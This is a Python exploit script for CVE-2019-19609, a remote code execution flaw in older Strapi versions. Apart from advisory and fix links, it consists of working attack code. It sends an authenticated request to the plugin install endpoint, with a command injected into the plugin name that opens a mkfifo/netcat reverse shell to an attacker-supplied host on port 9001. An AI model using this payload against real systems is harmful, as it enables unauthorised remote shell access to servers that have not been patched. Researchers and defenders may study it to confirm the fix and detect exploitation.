#!/bin/python

# Product: Strapi Framework
# Version Affected: strapi-3.0.0-beta.17.7 and earlier
# Fix PR: https://github.com/strapi/strapi/pull/4636
# NPM Advisory: https://www.npmjs.com/advisories/1424
# more information https://bittherapy.net/post/strapi-framework-remote-code-execution/

import requests
import sys

print("\n\n\nStrapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609")
print("please set up a listener on port 9001 before running the script. you will get a shell to that listener\n")

if len(sys.argv) ==5:
    rhost = sys.argv[1]
    lhost = sys.argv[2]
    jwt = sys.argv[3]
    url = sys.argv[4]+'admin/plugins/install'

    headers = {
        'Host': rhost,
        'Authorization': 'Bearer '+jwt,
        'Content-Type': 'application/json',
        'Content-Length': '131',
        'Connection': 'close',
    }

    data = '{ "plugin":"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc '+lhost+' 9001 >/tmp/f)", "port":"80" }'
    response = requests.post(url, headers=headers, data=data, verify=False)

else:
    print('python3 exploit.py <rhost> <lhost> <jwt> <url>')